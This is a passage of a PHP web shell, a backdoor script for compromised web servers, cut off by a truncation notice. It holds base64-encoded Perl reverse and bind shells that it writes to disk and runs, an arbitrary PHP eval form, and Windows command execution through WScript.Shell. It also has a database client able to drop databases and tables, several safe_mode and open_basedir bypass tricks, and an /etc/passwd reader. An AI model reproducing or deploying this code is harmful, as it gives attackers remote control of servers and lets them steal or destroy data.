  484. $fileContents = file_get_contents($directory.$file);
  485. $zipfile->add_file($fileContents, $put_into.$file);
  486. } elseif ($file != '.' and $file != '..' and is_dir($directory.$file)) {
  487. $zipfile->add_dir($put_into.$file.'/');
  488. get_files_from_folder($directory.$file.'/', $put_into.$file.'/');
  489. }
  490. }
  491. }
  492. closedir($handle);
  493. }
  494. $datedl=date("y-m-d");
  495. get_files_from_folder($dlfolder,'');
  496. header("Content-Disposition: attachment; filename=" . $_GET['dirname']."-".$datedl.".zip");
  497. header("Content-Type: application/download");
  498. header("Content-Length: " . strlen($zipfile -> file()));
  499. flush();
  500. echo $zipfile -> file();
  501. $filename = $_GET['dirname']."-".$datedl.".zip";
  502. $fd = fopen ($filename, "wb");
  503. $out = fwrite ($fd, $zipfile -> file());
  504. fclose ($fd);
  505. }
  506. if ($_REQUEST['cdirname']){
  507. if(mkdir($_REQUEST['cdirname'],"0777")){alert("Directory Created !");}else{alert("Permission Denied !");}}
  508. function bcn($ipbc,$pbc){
  509. $bcperl="IyEvdXNyL2Jpbi9wZXJsCiMgQ29ubmVjdEJhY2tTaGVsbCBpbiBQZXJsLiBTaGFkb3cxMjAgLSB3
  510. NGNrMW5nLmNvbQoKdXNlIFNvY2tldDsKCiRob3N0ID0gJEFSR1ZbMF07CiRwb3J0ID0gJEFSR1Zb
  511. MV07CgogICAgaWYgKCEkQVJHVlswXSkgewogIHByaW50ZiAiWyFdIFVzYWdlOiBwZXJsIHNjcmlw
  512. dC5wbCA8SG9zdD4gPFBvcnQ+XG4iOwogIGV4aXQoMSk7Cn0KcHJpbnQgIlsrXSBDb25uZWN0aW5n
  513. IHRvICRob3N0XG4iOwokcHJvdCA9IGdldHByb3RvYnluYW1lKCd0Y3AnKTsgIyBZb3UgY2FuIGNo
  514. YW5nZSB0aGlzIGlmIG5lZWRzIGJlCnNvY2tldChTRVJWRVIsIFBGX0lORVQsIFNPQ0tfU1RSRUFN
  515. LCAkcHJvdCkgfHwgZGllICgiWy1dIFVuYWJsZSB0byBDb25uZWN0ICEiKTsKaWYgKCFjb25uZWN0
  516. KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsIGluZXRfYXRvbigkaG9zdCkpKSB7ZGll
  517. KCJbLV0gVW5hYmxlIHRvIENvbm5lY3QgISIpO30KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOwog
  518. IG9wZW4oU1RET1VULCI+JlNFUlZFUiIpOwogIG9wZW4oU1RERVJSLCI+JlNFUlZFUiIpOwogIGV4
  519. ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow==";
  520. $opbc=fopen("bcc.pl","w");
  521. fwrite($opbc,base64_decode($bcperl));
  522. fclose($opbc);
  523. system("perl bcc.pl $ipbc $pbc") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode");
  524. }
  525. function wbp($wb){
  526. $wbp="dXNlIFNvY2tldDsKJHBvcnQJPSAkQVJHVlswXTsKJHByb3RvCT0gZ2V0cHJvdG9ieW5hbWUoJ3Rj
  527. cCcpOwpzb2NrZXQoU0VSVkVSLCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKTsKc2V0c29j
  528. a29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JFVVNFQUREUiwgcGFjaygibCIsIDEpKTsKYmlu
  529. ZChTRVJWRVIsIHNvY2thZGRyX2luKCRwb3J0LCBJTkFERFJfQU5ZKSk7Cmxpc3RlbihTRVJWRVIs
  530. IFNPTUFYQ09OTik7CmZvcig7ICRwYWRkciA9IGFjY2VwdChDTElFTlQsIFNFUlZFUik7IGNsb3Nl
  531. IENMSUVOVCkKewpvcGVuKFNURElOLCAiPiZDTElFTlQiKTsKb3BlbihTVERPVVQsICI+JkNMSUVO
  532. VCIpOwpvcGVuKFNUREVSUiwgIj4mQ0xJRU5UIik7CnN5c3RlbSgnY21kLmV4ZScpOwpjbG9zZShT
  533. VERJTik7CmNsb3NlKFNURE9VVCk7CmNsb3NlKFNUREVSUik7Cn0g";
  534. $opwb=fopen("wbp.pl","w");
  535. fwrite($opwb,base64_decode($wbp));
  536. fclose($opwb);
  537. echo getcwd();
  538. system("perl wbp.pl $wb") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode");
  539. }
  540. function lbp($wb){
  541. $lbp="IyEvdXNyL2Jpbi9wZXJsCnVzZSBTb2NrZXQ7JHBvcnQ9JEFSR1ZbMF07JHByb3RvPWdldHByb3Rv
  542. YnluYW1lKCd0Y3AnKTskY21kPSJscGQiOyQwPSRjbWQ7c29ja2V0KFNFUlZFUiwgUEZfSU5FVCwg
  543. U09DS19TVFJFQU0sICRwcm90byk7c2V0c29ja29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JF
  544. VVNFQUREUiwgcGFjaygibCIsIDEpKTtiaW5kKFNFUlZFUiwgc29ja2FkZHJfaW4oJHBvcnQsIElO
  545. QUREUl9BTlkpKTtsaXN0ZW4oU0VSVkVSLCBTT01BWENPTk4pO2Zvcig7ICRwYWRkciA9IGFjY2Vw
  546. dChDTElFTlQsIFNFUlZFUik7IGNsb3NlIENMSUVOVCl7b3BlbihTVERJTiwgIj4mQ0xJRU5UIik7
  547. b3BlbihTVERPVVQsICI+JkNMSUVOVCIpO29wZW4oU1RERVJSLCAiPiZDTElFTlQiKTtzeXN0ZW0o
  548. Jy9iaW4vc2gnKTtjbG9zZShTVERJTik7Y2xvc2UoU1RET1VUKTtjbG9zZShTVERFUlIpO30g";
  549. $oplb=fopen("lbp.pl","w");
  550. fwrite($oplb,base64_decode($lbp));
  551. fclose($oplb);
  552. system("perl lbp.pl $wb") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode");
  553. }
  554. if($_REQUEST['portbw']){
  555. wbp($_REQUEST['portbw']);
  556. }if($_REQUEST['portbl']){
  557. lbp($_REQUEST['portbl']);
  558. }
  559. if($_REQUEST['ipcb'] && $_REQUEST['portbc']){
  560. bcn($_REQUEST['ipcb'],$_REQUEST['portbc']);
  561. }
  562. if($_REQUEST['do']=="bc"){
  563. echo $head.$formp."<p align='center'>Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )<br><hr><p align='center'><<<<<< Back Connect >>>>>><br>Ip Address : <input name=ipcb value=".$_SERVER['REMOTE_ADDR'] ."> Port : <input name=portbc value=5555><br><input type=submit value=Connect></form>".$formp."<p align='center'>Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )<br><hr><p align='center'><<<<<< Windows Bind Port >>>>>><br>Port : <input name=portbw value=5555><br><input type=submit value=Connect></form>".$formp."<p align='center'>Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )<br><hr><p align='center'><<<<<< Linux Bind Port >>>>>><br>Port : <input name=portbl value=5555><br><input type=submit value=Connect></form>".$end;exit;
  564. }
  565. function copyf($file1,$file2,$filename){
  566. global $slash;
  567. $fpc = fopen($file1, "rb");
  568. $source = '';
  569. while (!feof($fpc)) {
  570. $source .= fread($fpc, 8192);
  571. }
  572. fclose($fpc);
  573. $opt = fopen($file2.$slash.$filename, "w");
  574. fwrite($opt, $source);
  575. fclose($opt);
  576. }
  577. if ($_REQUEST['copyname'] && $_REQUEST['cpyto']){
  578. if(is_writable($_REQUEST['cpyto'])){
  579. echo $_REQUEST['address'];
  580. copyf($_REQUEST['address'].$slash.$_REQUEST['copyname'],$_REQUEST['cpyto'],$_REQUEST['copyname']);
  581. }else{alert("Permission Denied !");}}
  582. if($_REQUEST['cfilename']){
  583. echo $head.$formp.$nowaddress.'<p align="center"><b>Create File</b><br><textarea rows="19" name="nf4cs" cols="87"></textarea><br><input value="'.$_REQUEST['cfilename'].'" name=nf4c size=50><br><input type=submit value=" Create "></form>'.$end;exit;
  584. }
  585. if($_REQUEST['nf4c'] && $_REQUEST['nf4cs']){
  586. if($ofile4c=fopen($_REQUEST['nf4c'],"w")){
  587. fwrite($ofile4c,$_REQUEST['nf4cs']);
  588. fclose($ofile4c);
  589. alert("File Saved !");}else{alert("Permission Denied !");}}
  590. function sqlclienT(){
  591. global $t,$errorbox,$et,$hcwd;
  592. if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && !empty($_REQUEST['querY'])){
  593. $server=$_REQUEST['serveR'];$type=$_REQUEST['typE'];$pass=$_REQUEST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY'];
  594. $db=(empty($_REQUEST['dB']))?'':$_REQUEST['dB'];
  595. $_SESSION[server]=$_REQUEST['serveR'];$_SESSION[type]=$_REQUEST['typE'];$_SESSION[pass]=$_REQUEST['pasS'];$_SESSION[user]=$_REQUEST['useR'];
  596. }
  597. if (isset ($_GET[select_db])){
  598. $getdb=$_GET[select_db];
  599. $_SESSION[db]=$getdb;
  600. $query="SHOW TABLES";
  601. $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
  602. }
  603. elseif (isset ($_GET[select_tbl])){
  604. $tbl=$_GET[select_tbl];
  605. $_SESSION[tbl]=$tbl;
  606. $query="SELECT * FROM `$tbl`";
  607. $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
  608. }
  609. elseif (isset ($_GET[drop_db])){
  610. $getdb=$_GET[drop_db];
  611. $_SESSION[db]=$getdb;
  612. $query="DROP DATABASE `$getdb`";
  613. querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],'',$query);
  614. $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],'','SHOW DATABASES');
  615. }
  616. elseif (isset ($_GET[drop_tbl])){
  617. $getbl=$_GET[drop_tbl];
  618. $query="DROP TABLE `$getbl`";
  619. querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
  620. $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],'SHOW TABLES');
  621. }
  622. elseif (isset ($_GET[drop_row])){
  623. $getrow=$_GET[drop_row];
  624. $getclm=$_GET[clm];
  625. $query="DELETE FROM `$_SESSION[tbl]` WHERE $getclm='$getrow'";
  626. $tbl=$_SESSION[tbl];
  627. querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
  628. $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],"SELECT * FROM `$tbl`");
  629. }
  630. else
  631. $res=querY($type,$server,$user,$pass,$db,$query);
  632. if($res){
  633. $res=htmlspecialchars($res);
  634. $row=array ();
  635. $title=explode('[+][+][+]',$res);
  636. $trow=explode('[-][-][-]',$title[1]);
  637. $row=explode('|+|+|+|+|+|',$title[0]);
  638. $data=array();
  639. $field=$trow[count($trow)-2];
  640. if (strstr($trow[0],'Database')!='')
  641. $obj='db';
  642. elseif (substr($trow[0],0,6)=='Tables')
  643. $obj='tbl';
  644. else
  645. $obj='row';
  646. $i=0;
  647. foreach ($row as $a){
  648. if($a!='')
  649. $data[$i++]=explode('|-|-|-|-|-|',$a);
  650. }
  651. echo "<table border=1 bordercolor='#C6C6C6' cellpadding='2' bgcolor='EAEAEA' width='100%' style='border-collapse: collapse'><tr>";
  652. foreach ($trow as $ti)
  653. echo "<td bgcolor='F2F2F2'>$ti</td>";
  654. echo "</tr>";
  655. $j=0;
  656. while ($data[$j]){
  657. echo "<tr>";
  658. foreach ($data[$j++] as $dr){
  659. echo "<td>";
  660. if($obj!='row') echo "<a href='$_SERVER[PHP_SELF]?do=db&select_$obj=$dr'>";
  661. echo $dr;
  662. if($obj!='row') echo "</a>";
  663. echo "</td>";
  664. }
  665. echo "<td><a href='$_SERVER[PHP_SELF]?do=db&drop_$obj=$dr";
  666. if($obj=='row')
  667. echo "&clm=$field";
  668. echo "'>Drop</a></td></tr>";
  669. }
  670. echo "</table><br>";
  671. }
  672. if(empty($_REQUEST['typE']))$_REQUEST['typE']='';
  673. echo "<center><form name=client method='POST' action='$_SERVER[PHP_SELF]?do=db'><table border='1' width='400' style='border-collapse: collapse' id='table1' bordercolor='#C6C6C6' cellpadding='2'><tr><td width='400' colspan='2' bgcolor='#F2F2F2'><p align='center'><b><font face='Arial' size='2' color='#433934'>Connect to Database</font></b></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>DB Type:</font></td><td width='250' bgcolor='#EAEAEA'><select name=typE><option valut=MySQL onClick='document.client.serveR.disabled = false;' ";
  674. if ($_REQUEST['typE']=='MySQL')echo 'selected';
  675. echo ">MySQL</option><option valut=MSSQL onClick='document.client.serveR.disabled = false;' ";
  676. if ($_REQUEST['typE']=='MSSQL')echo 'selected';
  677. echo ">MSSQL</option><option valut=Oracle onClick='document.client.serveR.disabled = true;' ";
  678. if ($_REQUEST['typE']=='Oracle')echo 'selected';
  679. echo ">Oracle</option><option valut=PostgreSQL onClick='document.client.serveR.disabled = false;' ";
  680. if ($_REQUEST['typE']=='PostgreSQL')echo 'selected';
  681. echo ">PostgreSQL</option><option valut=DB2 onClick='document.client.serveR.disabled = false;' ";
  682. if ($_REQUEST['typE']=='DB2')echo 'selected';
  683. echo ">IBM DB2</option></select></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>Server Address:</font></td><td width='250' bgcolor='#EAEAEA'><input type=text value='";
  684. if (!empty($_REQUEST['serveR'])) echo htmlspecialchars($_REQUEST['serveR']);else echo 'localhost';
  685. echo "' name=serveR size=35></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>Username:</font></td><td width='250' bgcolor='#EAEAEA'><input type=text name=useR value='";
  686. if (!empty($_REQUEST['useR'])) echo htmlspecialchars($_REQUEST['useR']);else echo 'root';
  687. echo "' size=35></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>Password:</font></td><td width='250' bgcolor='#EAEAEA'><input type=text value='";
  688. if (isset($_REQUEST['pasS'])) echo htmlspecialchars($_REQUEST['pasS']);else echo '123';
  689. echo "' name=pasS size=35></td></tr><tr><td width='400' colspan='2' bgcolor='#F2F2F2'><p align='center'><b><font face='Arial' size='2' color='#433934'>Submit a Query</font></b></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>DB Name:</font></td><td width='250' bgcolor='#EAEAEA'><input type=text value='";
  690. if (!empty($_REQUEST['dB'])) echo htmlspecialchars($_REQUEST['dB']);
  691. echo "' name=dB size=35></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>Query:</font></td><td width='250' bgcolor='#EAEAEA'><textarea name=querY rows=5 cols=27>";
  692. if (!empty($_REQUEST['querY'])) echo htmlspecialchars(($_REQUEST['querY']));else echo 'SHOW DATABASES';
  693. echo "</textarea></td></tr><tr><td width='400' colspan='2' bgcolor='#EAEAEA'>$hcwd<input class=buttons type=submit value='Submit' style='float: right'></td></tr></table></form>$et</center>";
  694. }
  695. function querY($type,$host,$user,$pass,$db='',$query){
  696. $res='';
  697. switch($type){
  698. case 'MySQL':
  699. if(!function_exists('mysql_connect'))return 0;
  700. $link=mysql_connect($host,$user,$pass);
  701. if($link){
  702. if(!empty($db))mysql_select_db($db,$link);
  703. $result=mysql_query($query,$link);
  704. if ($result!=1){
  705. while($data=mysql_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
  706. $res.='[+][+][+]';
  707. for($i=0;$i<mysql_num_fields($result);$i++)
  708. $res.=mysql_field_name($result,$i).'[-][-][-]';
  709. }
  710. mysql_close($link);
  711. return $res;
  712. }
  713. break;
  714. case 'MSSQL':
  715. if(!function_exists('mssql_connect'))return 0;
  716. $link=mssql_connect($host,$user,$pass);
  717. if($link){
  718. if(!empty($db))mssql_select_db($db,$link);
  719. $result=mssql_query($query,$link);
  720. while($data=mssql_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
  721. $res.='[+][+][+]';
  722. for($i=0;$i<mssql_num_fields($result);$i++)
  723. $res.=mssql_field_name($result,$i).'[-][-][-]';
  724. mssql_close($link);
  725. return $res;
  726. }
  727. break;
  728. case 'Oracle':
  729. if(!function_exists('ocilogon'))return 0;
  730. $link=ocilogon($user,$pass,$db);
  731. if($link){
  732. $stm=ociparse($link,$query);
  733. ociexecute($stm,OCI_DEFAULT);
  734. while($data=ocifetchinto($stm,$data,OCI_ASSOC+OCI_RETURN_NULLS))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
  735. $res.='[+][+][+]';
  736. for($i=0;$i<oci_num_fields($stm);$i++)
  737. $res.=oci_field_name($stm,$i).'[-][-][-]';
  738. return $res;
  739. }
  740. break;
  741. case 'PostgreSQL':
  742. if(!function_exists('pg_connect'))return 0;
  743. $link=pg_connect("host=$host dbname=$db user=$user password=$pass");
  744. if($link){
  745. $result=pg_query($link,$query);
  746. while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
  747. $res.='[+][+][+]';
  748. for($i=0;$i<pg_num_fields($result);$i++)
  749. $res.=pg_field_name($result,$i).'[-][-][-]';
  750. pg_close($link);
  751. return $res;
  752. }
  753. break;
  754. case 'DB2':
  755. if(!function_exists('db2_connect'))return 0;
  756. $link=db2_connect($db,$user,$pass);
  757. if($link){
  758. $result=db2_exec($link,$query);
  759. while($data=db2_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
  760. $res.='[+][+][+]';
  761. for($i=0;$i<db2_num_fields($result);$i++)
  762. $res.=db2_field_name($result,$i).'[-][-][-]';
  763. db2_close($link);
  764. return $res;
  765. }
  766. break;
  767. }
  768. return 0;
  769. }
  770. function bywsym($file){
  771. if(!function_exists('symlink')){echo "Function Symlink Not Exist";}
  772. if(!is_writable("."))
  773. die("not writable directory");
  774. $level=0;
  775. for($as=0;$as<$fakedep;$as++){
  776. if(!file_exists($fakedir))
  777. mkdir($fakedir);
  778. chdir($fakedir);
  779. }
  780. while(1<$as--) chdir("..");
  781. $hardstyle = explode("/", $file);
  782. for($a=0;$a<count($hardstyle);$a++){
  783. if(!empty($hardstyle[$a])){
  784. if(!file_exists($hardstyle[$a]))
  785. mkdir($hardstyle[$a]);
  786. chdir($hardstyle[$a]);
  787. $as++;
  788. }}
  789. $as++;
  790. while($as--)
  791. chdir("..");
  792. @rmdir("fakesymlink");
  793. @unlink("fakesymlink");
  794. @symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");
  795. while(1)
  796. if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
  797. else $num++;
  798. @unlink("fakesymlink");
  799. mkdir("fakesymlink");
  800. }
  801. function bypcu($file){
  802. $level=0;
  803. if(!file_exists("file:"))
  804. mkdir("file:");
  805. chdir("file:");
  806. $level++;
  807. $hardstyle = explode("/", $file);
  808. for($a=0;$a<count($hardstyle);$a++){
  809. if(!empty($hardstyle[$a])){
  810. if(!file_exists($hardstyle[$a]))
  811. mkdir($hardstyle[$a]);
  812. chdir($hardstyle[$a]);
  813. $level++;
  814. }
  815. }
  816. while($level--) chdir("..");
  817. $ch = curl_init();
  818. curl_setopt($ch, CURLOPT_URL, "file:file:///".$file);
  819. echo '<FONT COLOR="RED"> <textarea rows="40" cols="120">';
  820. if(FALSE==curl_exec($ch))
  821. die('>Sorry... File '.htmlspecialchars($file).' doesnt exists or you dont have permissions.');
  822. echo ' </textarea> </FONT>';
  823. curl_close($ch);
  824. }
  825. if ($_REQUEST['bypcu']){
  826. bypcu($_REQUEST['bypcu']);
  827. }
  828. if($_REQUEST['do']=="bypasscmd"){
  829. if($_POST['bycw']){
  830. echo $_POST['bycw'];
  831. $wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll');
  832. $exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['bycw']."");
  833. $stdout = $exec->StdOut();
  834. $stcom = $stdout->ReadAll();}
  835. echo $head.'<p align="center"><textarea rows="13" name="showbsd" cols="77">';if($_POST['byws']){passthru("\\".$_POST['byws']);} echo $stcom.'</textarea><hr><center>Bypass Safe_Mode And Disable_Functions In Windows Server<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'<input type=hidden value="bypasscmd" name=do>Command </font></td><td width="750"><input name=bycw size=50><input type=submit value ="eXecute"></form></td></tr></table>Bypass Safe_Mode Windows Server<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'Command </font></td><td width="750"><input name=byws size=50><input type=submit value ="eXecute"><input type=hidden name=do value="bypasscmd"></form></td></tr></table>'.$end;exit;;
  836. }
  837. if($_REQUEST['do']=="bypassdir"){
  838. if($_POST['byoc']){
  839. if(copy("compress.zlib://".$_POST['byoc'], getcwd()."/"."peji.txt")){
  840. $bopens="Bypass Succesfull Plz Read File Peji.txt In This Folder";
  841. }else{$bopens="Can Not Bypass This";}
  842. }
  843. if($_POST['byfc']){
  844. curl_init("file:///".$_POST['byfc']."\x00/../../../../../../../../../../../../".__FILE__);
  845. $debfc=curl_exec($ch);
  846. }
  847. if($_POST['byetc']){
  848. for($bye=0;$bye<40000;$bye++){
  849. $sbep =$sbep. posix_getpwuid($bye);
  850. }}
  851. if($_POST['byfc9']){
  852. echo "not sucsfull";
  853. }
  854. if($_REQUEST['bysyml']){
  855. $file=$_REQUEST['bysyml'];
  856. bywsym($file);
  857. }
  858. echo $head.'<p align="center"><textarea rows="13" name="showbsd" cols="77">';if($_POST['byws']){passthru("\\".$_POST['byws']);}if(isset($sbep)){for($fbe=0;$fbe<count($sbep);$fbe++){echo $sbep[$fbe];}} if(isset($debfc)){} echo $bopens.'</textarea><hr><center>Bypass Safe_Mode And Open_basedir With Bug Copy(Zlib) Worked In 4.4.2 .. 5.1.2<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right">'.$formp.'<input type=hidden value="bypassdir" name=do><font face="Tahoma" style="font-size: 10pt; font-weight:700">Address File </font></td><td width="750"><input name=byoc size=50 ><input type=submit value ="read"></form></td></tr></table><hr>Bypass Open_basedir And Read File With Bug Curl Worked In PHP 4.4.2 and 5.1.4<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'Address File </font></td><td width="750"><input name=byfc size=50><input type=submit value ="eXecute"><input type=hidden name=do value="bypassdir"></form></td></tr></table><hr>Bypass Open_basedir And Read File With Bug Curl Worked In PHP 4.X ... 5.2.9<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'Address File </font></td><td width="750"><input name=byfc9 size=50><input type=submit value ="eXecute"><input type=hidden name=do value="bypassdir"></form></td></tr></table><hr>Bypass /Etc/Passwd<br>'.$formp.'<input type=submit value ="Read Passwd"><input type=hidden name=byetc value="lol"><input type=hidden name=do value="bypassdir"></form><hr>Bypass With ini_restore'.$formp.'<input type=submit value ="Read File"><input name=rfili value="Pejijon" type=hidden><input type=hidden name=do value="bypassdir"></form><hr>Bypass With Symlink Worked In 5.x.x 5.2.11 With Bug Symlink<table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'</font></td><td width="750"><input name=bysyml size=50><input type=submit value ="Read File"><input type=hidden name=do value="bypassdir"><input name=rfili value="Pejijon" type=hidden></form></td></tr></table><hr>'.$formp.'Bypass Safe And Open_basedir With Bug Curl Worked In 4.x.x ... 5.2.9<table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'</font></td><td width="750"><input name=bypcu size=50><input type=submit value ="Read File"><input type=hidden name=do value="bypassdir"></form></td></tr></table>'.$end;exit;;
  859. }
  860. function printdrive(){
  861. global $slash;
  862. foreach (range("A","Z") as $tempdrive) {
  863. if (is_dir($tempdrive.":".$slash)){
  864. $adri=$tempdrive.":".$slash;
  865. $drivea=$drivea.'<a href="?address='.$adri.'"><font size=1>'.$tempdrive.':'.$slash.' </a></font>';
  866. }
  867. }
  868. return $drivea;
  869. }
  870. if($_POST['nameren'] && $_POST['addressren']){
  871. if(is_writable($_REQUEST['addressren'])){
  872. rename($_POST['addressren'],$_POST['nameren']);alert("Rename Successful !");
  873. }else{alert("Permission Denied !");}
  874. }
  875. if($_GET['do']=="delete"){
  876. if ($_GET['type']=="dir"){
  877. if(is_writable($_REQUEST['address'])){
  878. $dir=$_GET['address'].$_GET['filename'];
  879. deleteDirectory($dir);
  880. alert("Deleted Successful !");
  881. }else{alert("Permission Denied !");}
  882. }elseif($_GET['type']=="file"){
  883. if(is_writable($_GET['address'].$_GET['filename'])){
  884. unlink($_GET['address'].$_GET['filename']);alert("Deleted Successful !");
  885. }else{alert("Permission Denied !");}
  886. }
  887. }
  888. if($_POST['fedit'] && $_POST['namefe']){
  889. if(is_writable($_REQUEST['address'])){
  890. $opensave=fopen($_POST['address'].$slash.$_POST['namefe'],"w");
  891. fwrite($opensave,html_entity_decode($_POST['fedit']));
  892. fclose($opensave);alert("File Saved Successful !");
  893. }else{alert("Permission Denied !");}
  894. }
  895. if ($_POST['evalsource']){
  896. eval($_POST['evalsource']);
  897. }
  898. if($_GET['do']=="eval"){
  899. echo $head.$formp.$nowaddress.'<p align="center"><textarea rows="19" name="evalsource" cols="87"></textarea><br><input type=submit value=" eXecute "></form></p>'.$end;exit;
  900. }
  901. if($_GET['do']=="info"){
  902. if(ini_get('register_globals')){
  903. $registerg="Enable";
  904. }else{
  905. $registerg="disable";
  906. }
  907. if(extension_loaded('curl')){
  908. $curls="Enable";
  909. }else{
  910. $curls="disable";
  911. }
  912. if(@function_exists('mysql_connect')){
  913. $db_on = "Mysql : On";
  914. };
  915. if(@function_exists('mssql_connect')){
  916. $db_on = "Mssql : On";
  917. };
  918. if(@function_exists('pg_connect')){
  919. $db_on = "PostgreSQL : On";
  920. };if(@function_exists('ocilogon')){
  921. $db_on = "Oracle : On";
  922. };
  923. echo $head."<font face='Tahoma' size='2'>Operating System : ".php_uname()."<br>Server Name : ".$_SERVER['HTTP_HOST']."<br>Disable_Functions : ".$disablef."<br>Safe_Mode : ".$safe_modes."<br>Openbase_dir : ".ini_get('openbase_dir')."<br>Php Version : ".phpversion()."<br>Free Space : ".sizee(disk_free_space("/"))."<br>Total Space : ".sizee(disk_total_space("/"))."<br>Register_Globals : ".$registerg."<br>Curl : ".$curls."<br>Database ".$db_on."<br>Server Name : ".$_SERVER['HTTP_HOST']."<br>Admin Server : ".$_SERVER['SERVER_ADMIN'].$end;
  924. exit;
  925. }
  926. if ($_GET['do']=="cmd"){
  927. echo $head.'
  928. <form method=get action="'.$me.'">
  929. <p align="center">
  930. <textarea rows="19" name="S1" cols="87">';
  931. if (strlen($_GET['command'])>1 && $_GET['execmethod']!="popen"){
  932. echo $_GET['execmethod']($_GET['command']);}
  933. if (strlen($_POST['command'])>1 && $_POST['execmethod']!="popen"){
  934. echo $_POST['execmethod']($_POST['command']);}
  935. if (strlen($_GET['command'])>1 && $_GET['execmethod']=="popen"){
  936. popen($…

Large files files are truncated, but you can click here to view the full file